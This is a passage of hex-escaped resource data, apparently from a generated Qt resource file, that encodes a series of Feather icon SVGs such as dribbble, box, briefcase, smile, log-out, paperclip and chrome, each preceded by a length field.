\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x64\x72\x69\x62\x62\
\x62\x6c\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\
\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\
\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x61\
\x74\x68\x20\x64\x3d\x22\x4d\x38\x2e\x35\x36\x20\x32\x2e\x37\x35\
\x63\x34\x2e\x33\x37\x20\x36\x2e\x30\x33\x20\x36\x2e\x30\x32\x20\
\x39\x2e\x34\x32\x20\x38\x2e\x30\x33\x20\x31\x37\x2e\x37\x32\x6d\
\x32\x2e\x35\x34\x2d\x31\x35\x2e\x33\x38\x63\x2d\x33\x2e\x37\x32\
\x20\x34\x2e\x33\x35\x2d\x38\x2e\x39\x34\x20\x35\x2e\x36\x36\x2d\
\x31\x36\x2e\x38\x38\x20\x35\x2e\x38\x35\x6d\x31\x39\x2e\x35\x20\
\x31\x2e\x39\x63\x2d\x33\x2e\x35\x2d\x2e\x39\x33\x2d\x36\x2e\x36\
\x33\x2d\x2e\x38\x32\x2d\x38\x2e\x39\x34\x20\x30\x2d\x32\x2e\x35\
\x38\x2e\x39\x32\x2d\x35\x2e\x30\x31\x20\x32\x2e\x38\x36\x2d\x37\
\x2e\x34\x34\x20\x36\x2e\x33\x32\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x8d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x64\x69\x76\x69\x64\
\x65\x2d\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x38\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\
\x32\x3d\x22\x31\x36\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\
\x31\x32\x22\x20\x79\x31\x3d\x22\x31\x36\x22\x20\x78\x32\x3d\x22\
\x31\x32\x22\x20\x79\x32\x3d\x22\x31\x36\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\
\x20\x79\x31\x3d\x22\x38\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\
\x79\x32\x3d\x22\x38\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x63\
\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\
\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x63\
\x69\x72\x63\x6c\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3e\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x68\x65\x76\x72\
\x6f\x6e\x73\x2d\x72\x69\x67\x68\x74\x22\x3e\x3c\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x33\x20\
\x31\x37\x20\x31\x38\x20\x31\x32\x20\x31\x33\x20\x37\x22\x3e\x3c\
\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x36\x20\x31\x37\
\x20\x31\x31\x20\x31\x32\x20\x36\x20\x37\x22\x3e\x3c\x2f\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xce\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x6f\x78\x22\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x31\x20\x31\x36\x56\
\x38\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x2d\x31\x2d\x31\x2e\
\x37\x33\x6c\x2d\x37\x2d\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x30\x2d\x32\x20\x30\x6c\x2d\x37\x20\x34\x41\x32\x20\x32\x20\x30\
\x20\x30\x20\x30\x20\x33\x20\x38\x76\x38\x61\x32\x20\x32\x20\x30\
\x20\x30\x20\x30\x20\x31\x20\x31\x2e\x37\x33\x6c\x37\x20\x34\x61\
\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x20\x30\x6c\x37\x2d\
\x34\x41\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x31\x20\x31\
\x36\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x33\x2e\x32\
\x37\x20\x36\x2e\x39\x36\x20\x31\x32\x20\x31\x32\x2e\x30\x31\x20\
\x32\x30\x2e\x37\x33\x20\x36\x2e\x39\x36\x22\x3e\x3c\x2f\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x32\x32\x2e\x30\x38\x22\x20\
\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x57\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x72\x69\x65\x66\
\x63\x61\x73\x65\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x32\
\x22\x20\x79\x3d\x22\x37\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\
\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x34\x22\x20\x72\
\x78\x3d\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\
\x65\x63\x74\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x36\
\x20\x32\x31\x56\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x2d\
\x32\x2d\x32\x68\x2d\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\
\x2d\x32\x20\x32\x76\x31\x36\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x48\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x76\x6f\x6c\x75\x6d\
\x65\x2d\x31\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x31\x31\x20\x35\x20\x36\x20\x39\x20\x32\
\x20\x39\x20\x32\x20\x31\x35\x20\x36\x20\x31\x35\x20\x31\x31\x20\
\x31\x39\x20\x31\x31\x20\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\
\x6f\x6e\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x35\x2e\
\x35\x34\x20\x38\x2e\x34\x36\x61\x35\x20\x35\x20\x30\x20\x30\x20\
\x31\x20\x30\x20\x37\x2e\x30\x37\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x84\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x6d\x69\x6c\x65\
\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\
\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\x22\
\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x61\x74\x68\x20\
\x64\x3d\x22\x4d\x38\x20\x31\x34\x73\x31\x2e\x35\x20\x32\x20\x34\
\x20\x32\x20\x34\x2d\x32\x20\x34\x2d\x32\x22\x3e\x3c\x2f\x70\x61\
\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x39\x22\x20\
\x79\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x39\x2e\x30\x31\x22\
\x20\x79\x32\x3d\x22\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x35\x22\x20\x79\x31\x3d\
\x22\x39\x22\x20\x78\x32\x3d\x22\x31\x35\x2e\x30\x31\x22\x20\x79\
\x32\x3d\x22\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x01\x6f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6c\x6f\x67\x2d\x6f\
\x75\x74\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x39\x20\
\x32\x31\x48\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\
\x2d\x32\x56\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\
\x2d\x32\x68\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\
\x36\x20\x31\x37\x20\x32\x31\x20\x31\x32\x20\x31\x36\x20\x37\x22\
\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x31\x32\
\x22\x20\x78\x32\x3d\x22\x39\x22\x20\x79\x32\x3d\x22\x31\x32\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x60\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x61\x70\x65\x72\
\x63\x6c\x69\x70\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x32\x31\x2e\x34\x34\x20\x31\x31\x2e\x30\x35\x6c\x2d\x39\x2e\x31\
\x39\x20\x39\x2e\x31\x39\x61\x36\x20\x36\x20\x30\x20\x30\x20\x31\
\x2d\x38\x2e\x34\x39\x2d\x38\x2e\x34\x39\x6c\x39\x2e\x31\x39\x2d\
\x39\x2e\x31\x39\x61\x34\x20\x34\x20\x30\x20\x30\x20\x31\x20\x35\
\x2e\x36\x36\x20\x35\x2e\x36\x36\x6c\x2d\x39\x2e\x32\x20\x39\x2e\
\x31\x39\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2e\x38\
\x33\x2d\x32\x2e\x38\x33\x6c\x38\x2e\x34\x39\x2d\x38\x2e\x34\x38\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3e\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x72\x6e\x65\
\x72\x2d\x72\x69\x67\x68\x74\x2d\x64\x6f\x77\x6e\x22\x3e\x3c\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\
\x31\x30\x20\x31\x35\x20\x31\x35\x20\x32\x30\x20\x32\x30\x20\x31\
\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\
\x61\x74\x68\x20\x64\x3d\x22\x4d\x34\x20\x34\x68\x37\x61\x34\x20\
\x34\x20\x30\x20\x30\x20\x31\x20\x34\x20\x34\x76\x31\x32\x22\x3e\
\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xc0\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x68\x72\x6f\x6d\
\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\
\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\
\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\x69\x72\x63\
\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\
\x32\x22\x20\x72\x3d\x22\x34\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\
\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x31\x2e\x31\
\x37\x22\x20\x79\x31\x3d\x22\x38\x22\x20\x78\x32\x3d\x22\x31\x32\
\x22\x20\x79\x32\x3d\x22\x38\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x33\x2e\x39\x35\x22\x20\
\x79\x31\x3d\x22\x36\x2e\x30\x36\x22\x20\x78\x32\x3d\x22\x38\x2e\
\x35\x34\x22\x20\x79\x32\x3d\x22\x31\x34\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x30\x2e\
\x38\x38\x22\x20\x79\x31\x3d\x22\x32\x31\x2e\x39\x34\x22\x20\x78\
\x32\x3d\x22\x31\x35\x2e\x34\x36\x22\x20\x79\x32\x3d\x22\x31\x34\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x0f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x67\x69\x74\x68\x75\
